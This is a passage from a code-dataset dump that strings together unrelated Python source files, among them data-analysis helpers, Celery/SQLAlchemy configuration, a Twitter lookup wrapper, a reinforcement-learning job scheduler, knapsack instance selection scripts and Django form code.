range(len(self.APlocations)):\n dlist = self.duration_all[(self.duration_all['from'] == i) & (self.duration_all['duration'] != -1)]\n if(dlist['duration'].count() > 0):\n meantime[i] = dlist['duration'].sum() / dlist['duration'].count()\n with open(self.filepath+'/meantime.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow(meantime)\n return meantime\n\n\n def get_meantime2(self):\n meantime = [-1 for i in range(len(self.APlocations))]\n for i in range(len(self.APlocations)):\n dlist = self.duration_all[(self.duration_all['from'] == i) & (self.duration_all['duration'] != -1) & (self.duration_all['duration'] <= 3600*3)]\n if(dlist['duration'].count() > 0):\n meantime[i] = dlist['duration'].sum() / dlist['duration'].count()\n with open(self.filepath+'/meantime2.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow(meantime)\n return meantime","sub_path":"Wifilogcsv02_lib.py","file_name":"Wifilogcsv02_lib.py","file_ext":"py","file_size_in_byte":7930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"199470517","text":"import os\nimport sys\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom celery.signals import worker_process_init\nfrom sqlalchemy import event\nfrom sqlalchemy import exc\nfrom models import Base\n\nif sys.version_info < (3, 0):\n import ConfigParser\n config = ConfigParser.ConfigParser()\nelse:\n import configparser\n config = configparser.ConfigParser()\n\n\nconfig_dev_path = './{}/config.ini'.format(__name__)\nconfig_path = './{}/config_dev.ini'.format(__name__)\n\n# read config.ini file\nif os.path.exists(config_path):\n config.read(config_path)\nelse:\n config.read(config_dev_path)\n\n\ndef create_new_engine():\n engine = create_engine(\n config.get('database', 'database_url'),\n echo=config.getboolean('database', 'test') or False\n )\n\n return engine\n\nengine = create_new_engine()\n\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n#Base.metadata.create_all(engine)\n\n\n'''Why use a dict save engine and session?\nBecause using multiprocess, you should create new connection to database. \nIn the begin, I see the\nhttp://docs.sqlalchemy.org/en/latest/core/pooling.html#using-connection-pools-with-multiprocessing,\nand use above approaches, but on the new process start, have some error.\n'''\nsqla = {\n 'engine': engine,\n 'session': session\n}\n\n@worker_process_init.connect\ndef new_process(signal, sender):\n engine = create_new_engine()\n Session = sessionmaker(bind=engine)\n session = Session()\n\n sqla['engine'] = engine\n sqla['session'] = session\n","sub_path":"config/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"39751372","text":"import multiprocessing as mp\n\n\ndef cube(x):\n return x ** 3\n\n\n# The Pool.map and Pool.apply will lock the main program until all processes are finished\n# which is quite useful if we want to obtain results in a particular order for certain applications.\npool = mp.Pool(processes=4)\nresults = [pool.apply(cube, args=(x,)) for x in range(1, 7)]\nprint(results)\n\npool = mp.Pool(processes=4)\nresults = pool.map(cube, range(1,7))\nprint(results)\n\n# the async variants will submit all processes at once\n# and retrieve the results as soon as they are finished\npool = mp.Pool(processes=4)\nresults = [pool.apply_async(cube, args=(x,)) for x in range(1,7)]\noutput = [p.get() for p in results]\nprint(output)","sub_path":"threads/poolExample.py","file_name":"poolExample.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"317273956","text":"import time\nfrom core import Conv2d3dCore\nimport argparse\nfrom config import getConfig\n\nargParser = argparse.ArgumentParser()\nargParser.add_argument('--i', dest = 'input_file',default='/home/zhaohoj/Videos/龙门客栈00-05-00.mp4')\nargParser.add_argument('--o', dest = 'output_file',default='/home/zhaohoj/Videos/xx.mp4')\nargs = argParser.parse_args()\n\nif __name__ == '__main__':\n t0 = time.time()\n config = getConfig(args)\n core = Conv2d3dCore(config)\n core.wait()\n t1 = time.time()\n print('All Done!')\n print(f'Total use Time:{t1 - t0}')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"551677841","text":"'''\n Module for looking up Twitter users and tweets using Tweepy.\n'''\nfrom collections import namedtuple\nimport tweepy\n\nfrom twitterlookup import config \n\nclass Result(namedtuple('Result', ['twid', 'value'])):\n ''' namedtuple extended to have a different __str__ '''\n __slots__ = ()\n def __str__(self):\n return '{} -> {}'.format(self.twid, self.value)\n\nclass TwitterLookup(object):\n '''\n Lookup Twitter users and tweets using Tweepy.\n\n Expects a config file in ~/.twitterlookup for authenticating to Twitters API.\n '''\n def __init__(self):\n self.config = config.load_config()\n auth = tweepy.OAuthHandler(self.config['credentials']['consumer_key'],\n self.config['credentials']['consumer_secret'])\n auth.set_access_token(self.config['credentials']['access_token'],\n self.config['credentials']['access_token_secret'])\n\n self.api = tweepy.API(auth)\n\n def get_user(self, request):\n \"\"\" Get the user with the given screen name or id \"\"\"\n try:\n result = self.api.get_user(id=request)\n except tweepy.TweepError as error:\n if error.api_code == 50:\n return False\n else:\n raise\n\n return Result(result.id_str, result.screen_name)\n\n def get_tweet(self, tweet_id):\n \"\"\" Get tweet text by id \"\"\"\n try:\n result = self.api.get_status(tweet_id)\n except tweepy.TweepError as error:\n if error.api_code == 144:\n return False\n else:\n raise\n\n return Result(result.user.screen_name, result.text)\n","sub_path":"twitterlookup/lookup.py","file_name":"lookup.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"643886055","text":"import os\nimport sys\n\nwhereIam = os.uname()[1]\nassert whereIam in [\n \"wdtim719z\",\n \"calculon\",\n \"astroboy\",\n \"flexo\",\n \"bender\",\n \"ldtis706z\",\n]\n\nif whereIam == \"wdtim719z\":\n root = \"/data/\"\nif whereIam == \"ldtis706z\":\n root = \"/media/achanhon/bigdata/data/\"\nif whereIam in [\"calculon\", \"astroboy\", \"flexo\", \"bender\"]:\n root = \"/scratchf/\"\n\nif not os.path.exists(root + \"CIA\"):\n print(\"cia not found\")\n quit()\n\nos.system(\"rm -rf build\")\nos.makedirs(\"build\")\n\nif whereIam == \"wdtim719z\":\n os.system(\"/data/anaconda3/envs/pytorch/bin/python train.py\")\n os.system(\"/data/anaconda3/envs/pytorch/bin/python test.py\")\nif whereIam == \"ldtis706z\":\n os.system(\"python3 train.py\")\n os.system(\"python3 test.py\")\nif whereIam in [\"calculon\", \"astroboy\", \"flexo\", \"bender\"]:\n os.system(\"/d/jcastillo/anaconda3/bin/python train.py\")\n os.system(\"/d/jcastillo/anaconda3/bin/python test.py\")\n","sub_path":"segblock/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"303021094","text":"import os\nimport shutil\nimport cv2\nimport argparse\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom face_recognition import face_locations, face_encodings\n\nbgr_red = (0,0,255)\nbgr_blue = (255,0,0)\nbgr_white = (255,255,255)\nEXTs = ['.jpg', '.png']\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--img_dir', type=str, default='img', help=\"Define the relative path where the capture images are.\")\n parser.add_argument('--db_path', type=str, required=True, help=\"The path to face vector csv. (like `path/to/faec_vec.csv`)\")\n parser.add_argument('--ans', type=str, help=\"True label name.\")\n args = parser.parse_args()\n\n db = pd.read_csv(args.db_path)\n db_vec = np.array(db[db.columns[2:]])\n db_name = np.array(db[db.columns[1]])\n db_path = np.array(db[db.columns[0]])\n\n tree = args.img_dir.split(\"/\")\n store_dir = os.path.join(*tree[:-1], f\"annotated_{tree[-1]}\")\n if not os.path.isdir(store_dir):\n os.mkdir(store_dir)\n\n t=0; f=0\n for fn in tqdm(sorted(os.listdir(args.img_dir))):\n if os.path.splitext(fn)[-1].lower() in EXTs:\n path = os.path.join(args.img_dir, fn)\n to_path = os.path.join(store_dir, fn)\n img = cv2.imread(path)\n locations = face_locations(img)\n if len(locations) == 1:\n top, right, bottom, left = locations[0]\n face = img[top:bottom, left:right]\n query_vec = face_encodings(face)\n if len(query_vec) != 0:\n top_1_index = np.argmin(np.sum((db_vec - query_vec) ** 2, axis=1))\n name = db_name[top_1_index]\n if name==args.ans:\n t+=1\n label=\"True\"\n else:\n f+=1\n label=\"False\"\n # Draw Bounding Box and T/F\n cv2.rectangle(img, (left, top), (right, bottom), bgr_blue, 2)\n cv2.putText(img, label, (left, top), cv2.FONT_HERSHEY_SIMPLEX, 0.5, bgr_white, 1)\n cv2.imwrite(filename=to_path, img=img)\n\n print(f\"True: {t}\")\n print(f\"False: {f}\")\n","sub_path":"Face-Time-Card/Frame2img.py","file_name":"Frame2img.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"618852480","text":"import math\n\n\ndef find_largest_palindrome(first_multiplier: int, second_multiplier: int):\n if len(str(first_multiplier)) != 3 and len(str(second_multiplier)) != 3:\n return False\n product = first_multiplier * second_multiplier\n\n for palindrome_counter in range(product, 11, - 1):\n product_string = str(palindrome_counter)\n product_string_length = len(product_string)\n half_length = int(math.floor(product_string_length / 2))\n first_string = []\n second_string = []\n\n for counter in range(0, half_length):\n first_string.append(product_string[counter])\n\n for counter in range(product_string_length - 1, half_length - 1, -1):\n second_string.append(product_string[counter])\n\n if is_a_palindrome(first_string, second_string):\n return palindrome_counter\n\n return 1\n\n\ndef is_a_palindrome(first: list, second: list):\n return first == second\n\n\nprint(find_largest_palindrome(999, 919))\n","sub_path":"python/4-largest-palindrome-of-two-3-digit-numbers.py","file_name":"4-largest-palindrome-of-two-3-digit-numbers.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"371689519","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 3 14:34:03 2017\n\n@author: Pablo Franco (jpfranco123@gmail.com)\n\nInstance Random Selection and order Randomisation (KS-IC project)\n\n@Dependencies:\ninstanceSelctionFunctions.py\n\n@Input:\nGenerated Instance Files:\n 1. Solver specific: e.g. mzn-6-dm-1.csv\n 2. General Instance metrics: e.g. metrics-6-dm-1.csv\n\n@Output:\n1. Instance .txt files structured for Knapsack Unity game named in order i1.txt, i2.txt,...\nA. Decision: Instances:\nweights:[48,34,43,32,20,44]\nvalues:[26,24,34,47,17,11]\ncapacity:90\nprofit:100\nproblemID:98-0.41-0.63\ninstanceType:1\nsolution:0\n\nB. Optimistion Instances:\nweights:[29,8,19,41,40,32]\nvalues:[47,40,39,44,23,11]\ncapacity:69\nproblemID:144-0.41\ninstanceType:1\nprofitAtOptimum:126\ncapacityAtOptimum:56\nsolutionItems:[1,1,1,0,0,0]\n\n2. param2.txt instance information files with order ransomisation\nnumberOfTrials:9\nnumberOfBlocks:2\nnumberOfInstances:18\ninstanceRandomization:[10,15,11,1,14,18,4,5,12,3,7,13,6,17,8,16,2,9]\n\n\n\"\"\"\n\nimport pandas as pd\nimport importlib\nimport os\n\n#Project folder\nfolder = '/Users/jfranco1/Google Drive/Melbourne/UNIMELB/Research/Complexity Project/'\nos.chdir( folder +'KS-IC/Instance Selection/')\n\n#Imports all of the required functions\nimport instanceSelctionFunctions as isf\nimportlib.reload(isf)\n\n### General Input ###\n\n#Files to be uploaded with respect to the number of items\nnItems=[6]#,15,20,25,30]\n\n#Number of order randomizations (i.e. number of param2.txt files)\nnOrderRandomizations=30\n\n\n\n### INPUT Decision Variant ###\nproblemIDDec='-dm-1'\nfolderInputDec= folder + 'Data/Simulations Data/KS decision/'\nfolderOutDec= folder + 'KS-IC/Data/Simulations/instanceSelectionOutput/decision/'\n\n#number of bins to allocate ncapacity and nprofits to bins\nnbins=20\n\n#Normalized capacity from which to sample instances\nnCap=0.4\n\n#Normalized profit from which to sample IN-Phase-Transition instanes\nnProf=0.6\n\n#Normalized profit from which to sample OUT-OF-Phase-Transition instanes\nnProfNO=0.85\nnProfYES=0.35\n\n#How to categorize easy/hard IN-Phase-Transition\nquantileLow=0.5\nquantileUpper=0.5\n\n#bN blocks of tN trials\n#requires tN to be multiple of nTypes\ntNDec=24\nbNDec=3\nnTypesDec=6\n\n\n### INPUT Optimisation Variant ###\nproblemIDOpt='-rm-1'\nfolderInputOpt= folder + 'Data/Simulations Data/KS optimisation/'\nfolderOutOpt= folder + 'KS-IC/Data/Simulations/instanceSelectionOutput/optimisation/'\n\n#bN blocks of tN trials\n#requires tN to be multiple of the number of instances types there are\ntNOpt=9\nbNOpt=2\n#An array with possible types\npossibleTypesOpt=[1,3,5]\n\n\n### Decision Task instance selection\n\n## DATA UPLOAD\ndataMZN=isf.importSolvedInstances(nItems,'mzn',folderInputDec,problemIDDec)\n\n#Allocates ncapacity and nprofits to bins (BINS are defined with repect to left edge (i.e. nCap=0.5 means nCap in [0.5,0.5+binSize] ))\n### Add instance type ([1,6]) tp data according to the inputs\n#nProf: Normalized profit to sample within phase transition\n#nCap: Normalized profit to sample within phase transition\n#nProfNO: Normalized profit to sample outside the phase transition where there is NO solution\n#nProfYes: Normalized profit to sample outside the phase transition where there IS a solution\n#quantileLow: Easy instances at (nProf, nCap) are those below the quantileLow\n#quantileHigh: Hard instances at (nProf, nCap) are those above the quantileHigh\n## OutPut: 1=nProf-easy-NoSolution 2==nProf-easy-Solution 3=nProf-hard-NoSolution\n## 3=nProf-hard-Solution 5=nProfNo-NOSolution 6=nProfYES-Solution\n\n####################\n## Taking instance categorized according to MZN\n\ndataM=dataMZN[0]\ndataM=isf.binCapProf(dataM,nbins)\ndataM=isf.addInstanceType(dataM,nCap,nProf,nProfNO,nProfYES,quantileLow,quantileUpper,'propagations')\ndataDec=dataM\n\n## SAMPLING of Instances\n\n# Samples randomly from each instance-type sampleSizePerBin\n# Output: list of sublists. Each sublist has sampleSizePerBin size with the instances ID\n# Sampling is done withOUT replacement\nsizePerBin=int(tNDec*bNDec/(nTypesDec+2))\n#Total number (Including all blocks) instances per Type\nsampleSizePerBin=[sizePerBin,sizePerBin,sizePerBin,sizePerBin,2*sizePerBin,2*sizePerBin]\npossibleTypesDec=range(1,nTypesDec+1)\nsampleProblems=isf.sampleInstanceProblems3(dataDec,sampleSizePerBin,possibleTypesDec)\n\n#Exports all the instance files in the sampleProblems list\ninstanceNumber=1\nfor k in isf.flatten(sampleProblems):\n iw,iv,ic,ip,instanceType,solution=isf.extractInstance(dataDec,k)\n isf.exportInstance(iw,iv,ic,ip,k,instanceType,solution,folderOutDec,instanceNumber)\n instanceNumber=instanceNumber+1\n\n## INSTANCE ORDER GENERATION and param2.txt export\n\n# Generates the instance randomization order for bN blocks of tN trials for nTypes instance types\nnInstances=tNDec*bNDec\nfor i in range(0,nOrderRandomizations):\n instanceOrder=isf.generateInstanceOrder(tNDec, bNDec,sampleSizePerBin)\n isf.exportTaskInfo(tNDec,bNDec,instanceOrder,nInstances,folderOutDec,i) #Exports 'param2.txt' with the required input for the task\n\nsampleProblemsDec=sampleProblems\n\n\n### Optimisation Task instance selection\n\n### Data Upload\ndataMZN=isf.importSolvedInstances(nItems,'mzn',folderInputOpt,problemIDOpt)\n\n### Instance Type Attachment\ndataOpt=dataMZN[0]\n\n# Calculates nprofit for the optimization case (i.e. the optimum normalized profit)\ndataOpt=isf.calculateOptimum(dataOpt)\n\n# Merges Optimization data and relevant decision columns.\n# Aim: Add instance type from decision Problem to Optimization Problem\n# Warning: Here each optimization problem is mapped into many decion problems\ndataOptDec=isf.mergeOptDec(dataDec, dataOpt)\n\n\n#Keep only those instances where the nProfit of Decision problem (not binned) is the closest to nprofitOpt s.t. nprofitNoBinDec>nprofitOpt\n#This gives us instances that have solution: NO\ndataOptDec=isf.removeRepeatedOptInstances2(dataOptDec)\n\n\n### Sample Instances\n\nnTypesOpt=len(possibleTypesOpt)\nsizePerBin=int(tNOpt*bNOpt/(nTypesOpt))\nsampleSizePerBin=[sizePerBin,sizePerBin,sizePerBin]\n#sampleSizePerBin=int(tNOpt*bNOpt/nTypesOpt)\n\n# Samples randomly from each instance-type sampleSizePerBin\n# Output: list of sublists. Each sublist has sampleSizePerBin size with the instances ID\nsampleProblems=isf.sampleInstanceProblems3(dataOptDec,sampleSizePerBin,possibleTypesOpt)\n\n#Exports all the instance files in the sampleProblems list\ninstanceNumber=1\nfor k in isf.flatten(sampleProblems):\n iw,iv,ic,instanceType,pOpt,cOpt,itemsOpt=isf.extractInstanceOpt(dataOptDec,k)\n isf.exportInstanceOpt(iw,iv,ic,k,instanceType,folderOutOpt,instanceNumber,pOpt,cOpt,itemsOpt)\n instanceNumber=instanceNumber+1\n\n## INSTANCE ORDER GENERATION and param2.txt export\n\n# Generates the instance randomization order for bN blocks of tN trials for nTypes instance types\nnInstances=tNOpt*bNOpt\nfor i in range(0,nOrderRandomizations):\n instanceOrder=isf.generateInstanceOrder(tNOpt, bNOpt,sampleSizePerBin)\n isf.exportTaskInfo(tNOpt,bNOpt,instanceOrder,nInstances,folderOutOpt,i)#Exports 'param2.txt' with the required input for the task\n\nsampleProblemsOpt=sampleProblems\n","sub_path":"Code/Instance Selection/instanceSelectionBehavExp.py","file_name":"instanceSelectionBehavExp.py","file_ext":"py","file_size_in_byte":7089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"378069358","text":"def get_indices_of_item_weights(weights, length, limit):\n \"\"\"\n YOUR CODE HERE\n \"\"\"\n # Your code here\n # Create a dict with the index positions and weight values\n # Look for pairs by looping through the weights, checking our dictionary for a number that is equal to the limit minus the current weight(target weight)\n \n cache = {}\n\n for i in range(length):\n cache[weights[i]] = i\n \n for i, w in enumerate(weights):\n targetWeight = limit - w\n if targetWeight in cache:\n if i > cache[targetWeight]:\n return (i, cache[targetWeight])\n return (cache[targetWeight], i)\n \n return None\n ","sub_path":"hashtables/ex1/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"479262012","text":"import datetime, os\nfrom time import strftime, localtime\n\n\nclass LogMsg:\n ''' this a debug class, use to logit debug message in a file '''\n\n def __init__(self):\n self.logit_path = \"/usr/hcams/logs/\"\n self.file_name = \"debug.log\"\n self.server_name = \"\"\n self.num = \"0\"\n\n def init_log(self):\n date = strftime(\"%Y%m%d\", localtime())\n file_path_date = \"%s%s.%s\" % (self.logit_path, self.file_name, date)\n file_path = \"%s%s\" % (self.logit_path, self.file_name)\n self.fd = file(file_path_date, 'a', 1)\n self.fp = file(file_path, 'a', 1)\n\n def __check_logfile__(self):\n date = strftime(\"%Y%m%d\", localtime())\n file_path_date = \"%s%s.%s\" % (self.logit_path, self.file_name, date)\n if not os.path.exists(file_path_date):\n file_path = \"%s%s\" % (self.logit_path, self.file_name)\n self.end_log()\n try:\n os.remove(file_path)\n except OSError:\n pass\n self.init_log()\n\n def logit(self, message):\n self.__check_logfile__()\n now = strftime(\"%Y-%m-%d %H:%M:%S\", localtime())\n string = \"[%s]\" % now\n if self.server_name != \"\" and self.num != \"0\":\n string += \"[%s:%s]\" % (self.server_name, self.num)\n elif self.server_name != \"\":\n string += \"[%s]\" % self.server_name\n string += \" %s\\n\" % message \n self.fd.write(string)\n self.fp.write(string)\n\n def end_log(self):\n self.fd.close()\n self.fp.close()\n\n","sub_path":"python/python-modules/logging/Log-01.py","file_name":"Log-01.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"593945048","text":"from .node import Node\n\n\nclass ExecutionNode(Node):\n type = 'execution'\n\n def __init__(\n self,\n *,\n name,\n step,\n override=None\n ) -> None:\n if override is None:\n override = {}\n self.name = name\n self.step = step\n self.override = override\n\n def lint(self, lint_result, context: dict) -> None:\n super().lint(lint_result, context)\n config = context['config']\n pipeline = context['pipeline']\n if self.step not in config.steps:\n lint_result.add_error('Pipeline {pipeline} node {node} step {step} does not exist'.format(\n pipeline=pipeline.name,\n node=self.name,\n step=self.step,\n ))\n","sub_path":"valohai_yaml/objs/pipelines/execution_node.py","file_name":"execution_node.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"362386568","text":"\"\"\"This script runs the simulation\"\"\"\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom environment import Environment\nfrom parameters import Parameters\nfrom functions import run_episode, compute_returns, zero_pad, compute_baselines, compute_advantages, create_jobs, plot_iter, plot_rew, plot_iter_2, plot_test_bars, early_stopping, plot_memory_usage, plot_diff_memory_usage\nfrom policy_network import PolicyGradient\n\n# Create an object of parameters\nparam = Parameters()\n\n# Create the environment with the desired parameters\nenv = Environment(param)\n\n# Create the policy network\npg_network = PolicyGradient()\n\n# Build placeholders and operations\npg_network.build(env, param)\n\n# Visualization\navg_episode_duration = []\navg_job_duration = []\navg_reward = []\n\njobsets = [create_jobs(param.jobs_types, param.number_jobs, param) for jobset in range(param.jobsets)]\n\nfor iteration in tqdm(range(param.iterations)):\n if not early_stopping(avg_reward, param.patience):\n states_jobsets = []\n actions_jobsets = []\n rewards_jobsets = []\n advantages_jobsets = []\n\n # Visualization\n avg_episode_duration_jobset = []\n avg_job_duration_jobset = []\n avg_reward_jobset = []\n\n for jobset in jobsets:\n\n states_episodes = []\n actions_episodes = []\n rewards_episodes = []\n\n # Visualization\n avg_job_duration_ep_list = []\n total_reward_episodes = []\n\n # For each episode record the states, actions and rewards per time-step and store them in corresponding lists\n for episode in range(param.episodes):\n states, actions, rewards, avg_job_duration_ep, _ = run_episode(env, jobset, pg_network)\n\n states_episodes.append(states)\n actions_episodes.append(actions)\n rewards_episodes.append(rewards)\n\n # Visualization\n avg_job_duration_ep_list.append(avg_job_duration_ep)\n total_reward_episodes.append(sum(rewards))\n\n # Compute returns\n returns = [compute_returns(rewards, param.gamma) for rewards in rewards_episodes]\n\n # Zero pad returns to have equal length\n zero_padded_returns = zero_pad(returns)\n\n # Compute baselines\n baselines = compute_baselines(zero_padded_returns)\n\n # Compute advantages\n advantages = compute_advantages(returns, baselines)\n\n states_jobsets.append(states_episodes)\n actions_jobsets.append(actions_episodes)\n rewards_jobsets.append(rewards_episodes)\n advantages_jobsets.append(advantages)\n\n # Visualization\n # Store in a list the avg duration of the jobs of all the episodes of the iteration\n avg_job_duration_jobset.append(sum(avg_job_duration_ep_list) / param.episodes)\n # Store average episode duration\n avg_episode_duration_jobset.append(np.mean([i.shape[0] for i in states_episodes]))\n # Store average episode reward\n avg_reward_jobset.append(sum(total_reward_episodes) / param.episodes)\n\n # Update weights\n for j in range(param.jobsets):\n for i in range(param.episodes):\n pg_network.optimize_pg(states_jobsets[j][i], actions_jobsets[j][i], advantages_jobsets[j][i], param.lr)\n\n # Visualization\n # Store in a list the avg duration of the jobs of all the episodes of the iteration\n avg_job_duration.append(sum(avg_job_duration_jobset) / param.jobsets)\n # Store average episode duration\n avg_episode_duration.append(sum(avg_episode_duration_jobset) / param.jobsets)\n # Store average iteration episode reward\n avg_reward.append(sum(avg_reward_jobset) / param.jobsets)\n else:\n break\n\n# How does the process look like step by step for the training jobsets\nprint(\"Training-jobsets:\")\nprint(\"\\nRL scheduler:\")\nfor i, jobset in enumerate(jobsets):\n print(\"\\nJobset \" + str(i) + \":\")\n states, actions, rewards, train_RL, train_memory_RL = run_episode(env, jobset, pg_network, info=True)\n\nprint(\"\\nLB scheduler:\")\nlb_list = []\nfor i, jobset in enumerate(jobsets):\n print(\"\\nJobset \" + str(i) + \":\")\n states, actions, rewards, train_LB, train_memory_LB = run_episode(env, jobset, pg_network, scheduler='LB', info=True)\n lb_list.append(train_LB)\nlb_duration = np.mean(lb_list)\n\n# How does the process look like step by step for a test-jobset\nprint(\"\\nTest-jobset:\")\ntest_jobset = create_jobs(param.jobs_types, 20, param)\nprint(\"\\nRL scheduler:\")\nstates, actions_x, rewards, test_RL, test_memory_RL = run_episode(env, test_jobset, pg_network, info=True)\nprint(\"\\nLB scheduler:\")\nstates, actions_y, rewards, test_LB, test_memory_LB = run_episode(env, test_jobset, pg_network, info=True, scheduler='LB')\n\nprint('\\nAverage episode durations training jobsets: ' + str(avg_episode_duration))\nprint('Average job durations training jobsets: ' + str(avg_job_duration))\n\nprint('\\nTest jobset actions RL:' + str(actions_x))\nprint('Test jobset avg. job duration RL:' + str(test_RL))\n\nprint('\\nTest jobset actions LB:' + str(actions_y))\nprint('Test jobset avg. job duration LB:' + str(test_LB))\n\n# plot_iter(avg_episode_duration, 'Avg. episode duration')\nfolder = 'Test18'\nplot_iter_2(avg_job_duration, lb_duration, 'Avg. job duration', folder)\nplot_rew(avg_reward, 'Avg. total reward', folder)\nplot_test_bars(train_RL, train_LB, 'Training set', 'final_duration_training.png', folder)\nplot_test_bars(test_RL, test_LB, 'Test set', 'duration_test.png', folder)\nplot_memory_usage(train_memory_RL, train_memory_LB, 'memory_usage_training.png', folder)\nplot_memory_usage(test_memory_RL, test_memory_LB, 'memory_usage_test.png', folder)\nplot_diff_memory_usage(train_memory_RL, train_memory_LB, 'diff_memory_usage_training.png', folder)\nplot_diff_memory_usage(test_memory_RL, test_memory_LB, 'diff_memory_usage_test.png', folder)\n","sub_path":"other/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"625347848","text":"# _*_ coding:utf-8 _*_\nimport logging\nimport os.path\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__)).replace('/', '\\\\')\n\nLOG_TYPE = {\n 'command': 'command.log',\n 'transport': 'transport.log',\n}\n\n\ndef logger(log_type):\n\n # create logger\n logger = logging.getLogger(LOG_TYPE[log_type])\n logger.setLevel(logging.INFO)\n\n # log formatter\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n\n # log file\n log_file = os.path.join(BASE_DIR, 'log/%s' % LOG_TYPE[log_type])\n\n # create filehandler\n access_handler = logging.FileHandler(log_file)\n access_handler.setFormatter(formatter)\n\n # add to handler\n logger.addHandler(access_handler)\n return logger","sub_path":"learning/stage4/fabric/module/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"75183739","text":"import os\nimport sys\nimport datetime\nfrom sauron import logger\n\n# Append our current path before this import\np = os.path.dirname(os.path.abspath(__file__))\nif p not in sys.path:\n sys.path.insert(0, p)\n\n\nclass MetricException(Exception):\n def __init__(self, message):\n self.msg = message\n def __repr__(self):\n return repr(self.msg)\n def __str__(self):\n return str(self.msg)\n\n\nclass Metric(object):\n def __init__(self, name, keys=[], **kwargs):\n Metric.reconfig(self, name, keys)\n\n def reconfig(self, name, keys=[], **kwargs):\n self.name = name\n self.keys = keys\n\n def getValues(self):\n if self.keys:\n results = self.values()\n pruned = {}\n for k in self.keys:\n try:\n pruned[k] = results['results'][k]\n except KeyError:\n logger.warn('Key %s unavailable' % k)\n results['results'] = pruned\n return results\n else:\n return self.values()\n\n def values(self):\n return {'results': {'key': (0, 'Count')},\n 'time': datetime.datetime.now()}\n","sub_path":"sauron/metrics/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"88520029","text":"import math\n\n\ndef countPrime(x):\n if x < 2:\n return 1\n count = 0\n tmp = x\n for i in range(2, int(math.sqrt(x)) + 1):\n while tmp % i == 0:\n tmp //= i\n count += 1\n if tmp != 1:\n count += 1\n return count\n\n\ndef count_Kprimes(k, start, nd):\n return [x for x in range(start, nd + 1) if countPrime(x) == k]\n\n\ndef puzzle(s):\n res = set()\n for a in range(2, int(math.ceil(s // 2)) + 1):\n x = countPrime(a)\n if x not in {1, 3, 7}:\n continue\n for b in range(a + 1, int(math.ceil(s // 2)) + 1):\n y = countPrime(b)\n if y not in {1, 3, 7} or y == x:\n continue\n c = s - a - b\n z = countPrime(c)\n if z in {1, 3, 7} and z != x and z != y:\n res.add(tuple(sorted([a, b, c])))\n return len(res)\n\n\nprint(puzzle(290))\n","sub_path":"codewar/2021/k-Primes.py","file_name":"k-Primes.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"636696820","text":"from django import forms\nfrom .models import Car\nfrom django.forms.utils import ValidationError\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.db import transaction\n\nclass Car_Part_Form(forms.ModelForm):\n class Meta:\n model=Car\n fields=[\n 'Car_name',\n 'Car_model',\n 'Car_Part_Name',\n 'Car_Part_Info',\n 'category',\n 'Car_Part_Discription',\n 'Owner_info',\n 'Part_Image',\n ]\n\n","sub_path":"src/Car_Part_App/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"19778896","text":"\"\"\"\nCollection of methods intended to be used in account related processes.\nWithin the provided methods there is one to check ifr is locked due to\nfailed login attempts and assignation of permissions to groups and users.\n\"\"\"\nfrom collections import OrderedDict, defaultdict\nfrom datetime import timedelta\n\nfrom django.contrib.auth.models import Permission, Group\nfrom django.contrib.auth import get_user_model\nfrom django.db import transaction\nfrom django.utils import timezone\n\nfrom ttaa_base import constants\nfrom ttaa_base.models import Account_Locks\n\nUser = get_user_model()\n\n\ndef is_user_locked(user,\n 